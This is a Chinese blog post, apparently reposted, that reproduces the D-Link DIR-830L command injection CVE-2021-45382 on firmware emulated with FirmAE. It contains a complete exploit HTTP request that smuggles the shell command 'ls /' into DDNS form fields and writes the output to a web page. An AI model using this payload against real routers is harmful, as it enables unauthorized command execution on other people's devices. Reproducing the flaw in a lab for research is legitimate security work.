D-Link DIR-830L 路由器命令执行漏洞（CVE-2021-45382）复现

admin

140350
文章

117
评论

2023年6月30日14:22:20评论179 views字数 1140阅读3分48秒阅读模式

环境搭建

1.FirmAE 工具安装

首先拉取FirmAE 工具仓库

git clone --recursive https://github.com/pr0v3rbs/FirmAE

D-Link DIR-830L 路由器命令执行漏洞（CVE-2021-45382）复现

运行下载脚本

cd FirmAE/./download.sh

运行./install.sh进行安装

2.下载固件

本文模拟的是设备型号为D-Link DIR-830L

下载地址:

https://legacy.us.dlink.com/pages/product.aspx?id=f5e0c0a1975a46bab0b5f38b22c5087b

下载后得到DIR830LA1_FW100B07.bin固件文件

D-Link DIR-830L 路由器命令执行漏洞（CVE-2021-45382）复现

3.FirmAE工具初始化

在FirmAE工具目录下执行./init.sh进行初始化

4.安装binwalk

这里使用FirmAE工具目录下的binwalk安装程序进行安装

cd binwalk-2.3.3/python3 setup.py install

5.模拟运行固件
执行如下命令对固件进行解压

binwalk -Me /root/DIR830LA1_FW100B07.bin --run-as=root

执行如下命令来模拟运行固件

sudo ./run.sh -r DIR-830 /root/DIR830LA1_FW100B07.bin

使用浏览器访问http://192.168.0.1

漏洞复现

Exp如下：

POST /ddns_check.ccp HTTP/1.1Host: 192.168.0.1User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestContent-Length: 102Origin: http://192.168.0.1Connection: closeCookie: uid=YnnCDFxmJY # 认证信息，此漏洞需要认证ccp_act=doCheck&ddnsHostName=;ls />/www/1.html;&ddnsUsername=;ls />/www/1.html;&ddnsPassword=123123123

这里我们已经成功看到执行系统命令，并将ls /命令的结果写入1.html中，直接访问即可查看命令执行的效果。

D-Link DIR-830L 路由器命令执行漏洞（CVE-2021-45382）复现

原文始发于微信公众号（第59号）：D-Link DIR-830L 路由器命令执行漏洞（CVE-2021-45382）复现

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

D-Link DIR-830L 路由器命令执行漏洞（CVE-2021-45382）复现

嵌入式开发绝招：状态机+事件驱动框架

英飞凌Aurix™ TC3XX 中断及异常处理系统详解

immortalwrt可以直接安装应用过滤插件了

某无人驾驶智能车远程开锁记录

硬件安全模块 (HSM)、硬件安全引擎 (HSE) 和安全硬件扩展 (SHE)的区别

数据驱动的低空监视网络安全威胁分析

无人集群的网络安全挑战与应对

车载CAN网络的错误帧结构及作用

车联网安全-TARA分析

最佳实践：通过有效的基于风险的漏洞管理加强汽车网络安全

发表评论

在线咨询

微信